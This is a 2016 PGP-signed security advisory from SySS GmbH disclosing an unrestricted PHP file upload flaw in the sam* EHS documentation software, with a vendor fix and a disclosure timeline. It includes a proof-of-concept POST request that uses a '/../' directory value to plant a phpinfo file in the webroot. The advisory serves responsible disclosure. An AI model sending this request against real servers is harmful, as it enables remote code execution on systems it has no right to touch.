-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2016-002
Product: sam*
Vendor: secova
Affected Version(s): 5.8.2 and below
Tested Version(s): 5.7.11
Vulnerability Type: Unrestricted Upload of File with Dangerous Type (CWE-434)
Risk Level: High
Solution Status: Fixed
Vendor Notification: 2016-01-08
Solution Date: 2016-04-18
Public Disclosure: 2016-05-24
CVE Reference: Not assigned
Author of Advisory: Franz G. Jahn, SySS GmbH, https://www.syss.de/advisories/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

It was discovered that the sam* application is susceptible to upload of
PHP files which can be used for arbitrary code execution.

The sam* application is described as follows [2]:

"sam* is an electronic documentation system and is used primarily in the
areas of health and safety, occupational safety, occupational health,
environmental protection, quality waste management and HR.
(Keyword: EHS Software)
All essential operational requirements for companies are ideally
satisfied with sam*. sam* dovetails the most important main and sub-
disciplines (ISO, OHSAS, knowledge logistics and legal compliance) with
one another."

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

The application contains a gallery function which allows users to upload
images. However, this function can be used to upload arbitrary files to
arbitrary locations.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

The following POST request can be used to place an info.php file inside
the webroot:

POST /libs/sam/editor/gallery/dispatchGallery.php HTTP/1.1
Host: <host>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=<validSessionId>
Content-Type: multipart/form-data; boundary=---------------------------568566108187924197632022778
Content-Length: 561

- -----------------------------568566108187924197632022778
Content-Disposition: form-data; name="gUploadFile"; filename="info.php"
Content-Type: image/png

<?php 
phpinfo();
?>

- -----------------------------568566108187924197632022778
Content-Disposition: form-data; name="module"

uploadFile
- -----------------------------568566108187924197632022778
Content-Disposition: form-data; name="directory"

/../
- -----------------------------568566108187924197632022778--


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Upgrade to version 5.8.3 or later

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2015-12-22: Vulnerability discovered
2016-01-08: Vulnerability reported to vendor
2016-04-18: Release of a fixed version
2016-05-24: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] SySS GmbH, SYSS-2016-002
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2016-002.txt
[2] Vendor description of sam*
    https://www.secova.de/en/home/what-is-sam/
[3] SySS GmbH, SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:


Security vulnerability found by Franz G. Jahn of the SySS GmbH.

E-Mail: franz.jahn (at) syss.de
Public Key: https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Franz_Jahn.asc
Key ID: 0xD06A14DE
Key Fingerprint: 2D26 E435 DF7F 572D A0C9 1DE8 D5A6 1496 D06A 14DE

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is" 
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of  this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCgAGBQJXQzo9AAoJENWmFJbQahTecuoP/22U6wHBYTgrV8NQey2gS/OV
m+xA9nAj8HiKFMs4UfOQUdOpbH5IpTm1cdtjs6gXt9XBcunbpY4Q7lVlssIEycHe
hQr6mbrqhNwExjvjzMCgv94wqHd+22OcS1Y8oa3P6FAWo8kq4zRi1MifKwVaPQgv
DKwTXIbJF3kZIYn5NNV50CKBPo6XQZefPEoFxxP5qOHq4bCykA8F/PXBMEBtxtyT
JUi4eBaf7u176k/6cjRQysBqcivdqwWplBmh2kMgXvrnIFQDuSLPY9KPqb9aDqJx
ohtfurW8PRggNX78/LXJkb64jU757MzAegq1HoaHuBLggUmmFaewEfE7EoToHAVC
zbMdBU9jghMqGCfBguYppBlClrTkkJR1BYBVKufkxy/ZdSYUDR6r0zPsVRn8LjO0
9HwuqCMn6Vv28MfEWQ8Uafe3lfHPBlmKDxXjBukicSt7e2aqWH8pMmadbNN0WCCp
/wtJ/pHqZkTX3AjvCmxtKBc4dvWXuvBV1i0ePhIdzDKc0rW8ZMZk+0+/Zhrz8DVy
drd9EdLUTh8cI5yzA3nU/akCtUgNSSwhGoUCN651j6WNp6IRDez3MXzXbr+vYFAX
l4z/SBY9K2fYVsWiQBWmVgCKKAjf7NGYK9EIyOhxmActOodjRLwjRCgppmGDWM3w
Y8R1FAVLuXTC12K+jXd1
=WTHx
-----END PGP SIGNATURE-----